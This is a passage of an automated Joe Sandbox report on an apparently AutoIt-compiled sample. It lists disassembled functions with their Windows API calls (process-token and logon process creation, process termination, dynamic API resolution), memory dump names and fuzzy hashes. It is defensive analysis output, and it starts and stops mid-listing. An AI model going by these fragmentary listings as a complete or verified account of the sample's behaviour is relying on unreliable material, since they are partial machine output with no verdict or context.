                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$Show$Enable$MessageSend
                            • String ID:
                            • API String ID: 642888154-0
                            • Opcode ID: 823cd07d31c12781668092103aecd892721a0cef07579edf616039154c4c265c
                            • Instruction ID: 9de1dd544bfca04913dca13fd80a9b061f2ffb91d2dda30803fe5409b9ed7187
                            • Opcode Fuzzy Hash: 823cd07d31c12781668092103aecd892721a0cef07579edf616039154c4c265c
                            • Instruction Fuzzy Hash: 344191302005C8EFDB66CF65C899B947BE5BB0A304F1841B9FB589F6A2C772A841CB51
                            Function 000BBC90 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000BBCD9
                            • OpenProcessToken.ADVAPI32(00000000), ref: 000BBCE0
                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 000BBCEF
                            • CloseHandle.KERNEL32(00000004), ref: 000BBCFA
                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000BBD29
                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 000BBD3D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                            • String ID:
                            • API String ID: 1413079979-0
                            • Opcode ID: bdb7ad7e06dc50335841b9255a375a653327ac137e7b389e1ccbafa8a1402fa1
                            • Instruction ID: 02acfff42420f2046b61894a810eb67a5689722138040bd03b7be94cb3c17d58
                            • Opcode Fuzzy Hash: bdb7ad7e06dc50335841b9255a375a653327ac137e7b389e1ccbafa8a1402fa1
                            • Instruction Fuzzy Hash: 19216D7210020DABDF11DFA8ED49BEE7BA9EF04308F044024FA05A6160DBB6DD61DBA0
                            Function 000EE9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0009B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0009B5EB
                              • Part of subcall function 0009B58B: SelectObject.GDI32(?,00000000), ref: 0009B5FA
                              • Part of subcall function 0009B58B: BeginPath.GDI32(?), ref: 0009B611
                              • Part of subcall function 0009B58B: SelectObject.GDI32(?,00000000), ref: 0009B63B
                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 000EE9F2
                            • LineTo.GDI32(00000000,00000003,?), ref: 000EEA06
                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 000EEA14
                            • LineTo.GDI32(00000000,00000000,?), ref: 000EEA24
                            • EndPath.GDI32(00000000), ref: 000EEA34
                            • StrokePath.GDI32(00000000), ref: 000EEA44
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                            • String ID:
                            • API String ID: 43455801-0
                            • Opcode ID: dc602bb393ea32a78d034db23c683c68c63fae4fd42b764fe395f9864aa9bb2a
                            • Instruction ID: bc4a69c737e1689aa6dadf5dbda7f1e595c12852529e42c9d7f41e789cee6ad0
                            • Opcode Fuzzy Hash: dc602bb393ea32a78d034db23c683c68c63fae4fd42b764fe395f9864aa9bb2a
                            • Instruction Fuzzy Hash: 0E111B7600014DBFDF029F90EC88EDA7FADEB08350F048021FE595A560D7B19D95DBA0
                            Function 000BEF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                            Download Yara Rule
                            APIs
                            • GetDC.USER32(00000000), ref: 000BEFB6
                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 000BEFC7
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000BEFCE
                            • ReleaseDC.USER32(00000000,00000000), ref: 000BEFD6
                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 000BEFED
                            • MulDiv.KERNEL32(000009EC,?,?), ref: 000BEFFF
                              • Part of subcall function 000BA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,000BA79D,00000000,00000000,?,000BAB73), ref: 000BB2CA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CapsDevice$ExceptionRaiseRelease
                            • String ID:
                            • API String ID: 603618608-0
                            • Opcode ID: dea116f88cf899e21ccb08a0a2a6ad8d2c44220c4b709a189d61ad5f11a885f6
                            • Instruction ID: 3629922eac67a2bf4b3d8d1e758c6706e640158d836027b1d67f5578f420fcf7
                            • Opcode Fuzzy Hash: dea116f88cf899e21ccb08a0a2a6ad8d2c44220c4b709a189d61ad5f11a885f6
                            • Instruction Fuzzy Hash: 32018475A00205BFEB109BE5DC45B9EBFB8EB48751F004066FA08AB290D6719C00CB61
                            Function 000A87D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                            Download Yara Rule
                            APIs
                            • __init_pointers.LIBCMT ref: 000A87D7
                              • Part of subcall function 000A1E5A: __initp_misc_winsig.LIBCMT ref: 000A1E7E
                              • Part of subcall function 000A1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000A8BE1
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000A8BF5
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000A8C08
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000A8C1B
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000A8C2E
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 000A8C41
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 000A8C54
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 000A8C67
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 000A8C7A
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 000A8C8D
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 000A8CA0
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 000A8CB3
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 000A8CC6
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 000A8CD9
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 000A8CEC
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 000A8CFF
                            • __mtinitlocks.LIBCMT ref: 000A87DC
                              • Part of subcall function 000A8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0013AC68,00000FA0,?,?,000A87E1,000A6AFA,001367D8,00000014), ref: 000A8AD1
                            • __mtterm.LIBCMT ref: 000A87E5
                              • Part of subcall function 000A884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,000A87EA,000A6AFA,001367D8,00000014), ref: 000A89CF
                              • Part of subcall function 000A884D: _free.LIBCMT ref: 000A89D6
                              • Part of subcall function 000A884D: DeleteCriticalSection.KERNEL32(0013AC68,?,?,000A87EA,000A6AFA,001367D8,00000014), ref: 000A89F8
                            • __calloc_crt.LIBCMT ref: 000A880A
                            • GetCurrentThreadId.KERNEL32 ref: 000A8833
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                            • String ID:
                            • API String ID: 2942034483-0
                            • Opcode ID: 816893e452489bfa14735bf1974d9cc80c07542a66bb546587ed661aeb454337
                            • Instruction ID: e94f133ad2bab427ea2528d447fa765b2acb5ba5e9ecf3398d5305259417fa4c
                            • Opcode Fuzzy Hash: 816893e452489bfa14735bf1974d9cc80c07542a66bb546587ed661aeb454337
                            • Instruction Fuzzy Hash: 0BF0903251D7125AE26477F87C076CA2AD09F03770B60CA6AF4A5D50D3FF1088814361
                            Function 000CA3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                            • String ID:
                            • API String ID: 1423608774-0
                            • Opcode ID: bab6953b16e9f0592360629017ec1cc8d521ce7a4bcef6551ce475f46842b5f0
                            • Instruction ID: 02324b8475df1fd7669c8d9391978e3fe3d5fcb9595e4f99b62f3629e52d1984
                            • Opcode Fuzzy Hash: bab6953b16e9f0592360629017ec1cc8d521ce7a4bcef6551ce475f46842b5f0
                            • Instruction Fuzzy Hash: A001A432201211ABDB152B94FD98EEF77B9FF8A702B40052DF543D29A5CFB0A940CB51
                            Function 00081867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00081898
                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 000818A0
                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000818AB
                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 000818B6
                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 000818BE
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 000818C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Virtual
                            • String ID:
                            • API String ID: 4278518827-0
                            • Opcode ID: 8ce779c485eee103ef92e9c76d60174f1328a8c3d2ac80e66fb119a040d732db
                            • Instruction ID: 497838952fb2660643f7447ed669f830c47975fde2ec2671ec4200f6dc5d182e
                            • Opcode Fuzzy Hash: 8ce779c485eee103ef92e9c76d60174f1328a8c3d2ac80e66fb119a040d732db
                            • Instruction Fuzzy Hash: BB0167B0902B5ABDE3008F6A8C85B52FFB8FF19354F04411BA15C47A42C7F5A864CBE5
                            Function 000C84F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                            Download Yara Rule
                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 000C8504
                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 000C851A
                            • GetWindowThreadProcessId.USER32(?,?), ref: 000C8529
                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000C8538
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000C8542
                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000C8549
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                            • String ID:
                            • API String ID: 839392675-0
                            • Opcode ID: aa7077dcf5ddd58315ab0442c9e6ac0f3151cd513f2541dcd8b5781215cb711c
                            • Instruction ID: ede5e96ba7a2cd9a381f383e329ac4f17f16bb5300f33e91494f44917bf90884
                            • Opcode Fuzzy Hash: aa7077dcf5ddd58315ab0442c9e6ac0f3151cd513f2541dcd8b5781215cb711c
                            • Instruction Fuzzy Hash: C3F03A72240158BBE7215BA2AD0EEEF7A7CEFC6B15F000058FA4591051EFF16A81C6B5
                            Function 000CA31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • InterlockedExchange.KERNEL32(?,?), ref: 000CA330
                            • EnterCriticalSection.KERNEL32(?,?,?,?,000F66D3,?,?,?,?,?,0008E681), ref: 000CA341
                            • TerminateThread.KERNEL32(?,000001F6,?,?,?,000F66D3,?,?,?,?,?,0008E681), ref: 000CA34E
                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,000F66D3,?,?,?,?,?,0008E681), ref: 000CA35B
                              • Part of subcall function 000C9CCE: CloseHandle.KERNEL32(?,?,000CA368,?,?,?,000F66D3,?,?,?,?,?,0008E681), ref: 000C9CD8
                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 000CA36E
                            • LeaveCriticalSection.KERNEL32(?,?,?,?,000F66D3,?,?,?,?,?,0008E681), ref: 000CA375
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                            • String ID:
                            • API String ID: 3495660284-0
                            • Opcode ID: b41c7d61c711cc809d09ad623e68bec9129431ad844f14665aa035329a6514a8
                            • Instruction ID: d379e14392d1a715f50ce96c0a12f08d7f4e82c015257835a2b066a4eaa18f4e
                            • Opcode Fuzzy Hash: b41c7d61c711cc809d09ad623e68bec9129431ad844f14665aa035329a6514a8
                            • Instruction Fuzzy Hash: 3FF08C72141211ABD3112BA4FD8CEDF7BBAFF8A302B400525F243A58A5CFF59981CB61
                            Function 0009D7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000A010A: std::exception::exception.LIBCMT ref: 000A013E
                              • Part of subcall function 000A010A: __CxxThrowException@8.LIBCMT ref: 000A0153
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                              • Part of subcall function 0008BBD9: _memmove.LIBCMT ref: 0008BC33
                            • __swprintf.LIBCMT ref: 0009D98F
                            Strings
                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0009D832
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                            • API String ID: 1943609520-557222456
                            • Opcode ID: 3dd365910125c1047718e1d52295a49b7f485a7da5396d703876f73c8ac7e481
                            • Instruction ID: 407e1a5535d76621d8138cd5fc8c80d2961a10667b18bf6201c177ab202e0951
                            • Opcode Fuzzy Hash: 3dd365910125c1047718e1d52295a49b7f485a7da5396d703876f73c8ac7e481
                            • Instruction Fuzzy Hash: 8E915B311182059FCB54FF28C895DAEB7E5FF95710F00492EF596972A2DB20EE04EB92
                            Function 000DB482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 000DB4A8
                            • CharUpperBuffW.USER32(?,?), ref: 000DB5B7
                            • VariantClear.OLEAUT32(?), ref: 000DB73A
                              • Part of subcall function 000CA6F6: VariantInit.OLEAUT32(00000000), ref: 000CA736
                              • Part of subcall function 000CA6F6: VariantCopy.OLEAUT32(?,?), ref: 000CA73F
                              • Part of subcall function 000CA6F6: VariantClear.OLEAUT32(?), ref: 000CA74B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                            • API String ID: 4237274167-1221869570
                            • Opcode ID: 7d562a2efa3951c954f796f150478a0cf9103dc26e14529dff26d49c257837d6
                            • Instruction ID: 09bfb9589f44b9a599b71da65665c70a380146a76f10f8ef93e4b4c7dd146608
                            • Opcode Fuzzy Hash: 7d562a2efa3951c954f796f150478a0cf9103dc26e14529dff26d49c257837d6
                            • Instruction Fuzzy Hash: 86914A74608301DFCB10EF24C485A9ABBF4BF89714F14496EF89A9B352DB31E945CB62
                            Function 000C1050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000C10B8
                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 000C10EE
                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 000C10FF
                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000C1181
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorMode$AddressCreateInstanceProc
                            • String ID: DllGetClassObject
                            • API String ID: 753597075-1075368562
                            • Opcode ID: 6789ba0e269f964d11e3956d50aca94afe022f49665f7c2fbf996abcd9d9ef58
                            • Instruction ID: 3acbb2bb095dd89adec72309c1c1c8f5fa0741d4daf588b3043abc32e1d626e8
                            • Opcode Fuzzy Hash: 6789ba0e269f964d11e3956d50aca94afe022f49665f7c2fbf996abcd9d9ef58
                            • Instruction Fuzzy Hash: D5413871600204AFDB15CF54C884FEE7BA9EF46354F1880ADEE099F246D7B5D944CBA0
                            Function 000C5A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 000C5A93
                            • GetMenuItemInfoW.USER32 ref: 000C5AAF
                            • DeleteMenu.USER32(00000004,00000007,00000000), ref: 000C5AF5
                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001418F0,00000000), ref: 000C5B3E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Menu$Delete$InfoItem_memset
                            • String ID: 0
                            • API String ID: 1173514356-4108050209
                            • Opcode ID: cc6f4c21acf2c26ab1e7cc69514afac2626b1bb443c050396bcbb1d38c2c9f61
                            • Instruction ID: 89c88dae353f40a7ce4387ed06e2a15af45c5e36093ffe83705364664dbc6ef9
                            • Opcode Fuzzy Hash: cc6f4c21acf2c26ab1e7cc69514afac2626b1bb443c050396bcbb1d38c2c9f61
                            • Instruction Fuzzy Hash: E1418F752047019FDB249F28DC84F6EBBE4EF89315F04461DF9A59B2D2DB70A880CB62
                            Function 000E0458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                            Download Yara Rule
                            APIs
                            • CharLowerBuffW.USER32(?,?,?,?), ref: 000E0478
                              • Part of subcall function 00087F40: _memmove.LIBCMT ref: 00087F8F
                              • Part of subcall function 0008A2FB: _memmove.LIBCMT ref: 0008A33D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove$BuffCharLower
                            • String ID: cdecl$none$stdcall$winapi
                            • API String ID: 2411302734-567219261
                            • Opcode ID: c2121e20d859172ce7bf9b270eb79212d5c210a3079256f96ae33d97eb036de0
                            • Instruction ID: f429dbe7f507cd75919eb8bd699532742015f65473f076265b4cd7cbf1b044e4
                            • Opcode Fuzzy Hash: c2121e20d859172ce7bf9b270eb79212d5c210a3079256f96ae33d97eb036de0
                            • Instruction Fuzzy Hash: C7318D71500A1AAFCF04EF59C940AEEB3B5FF15350B108A2AE462A72D2DBB1E945CF40
                            Function 000BC600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
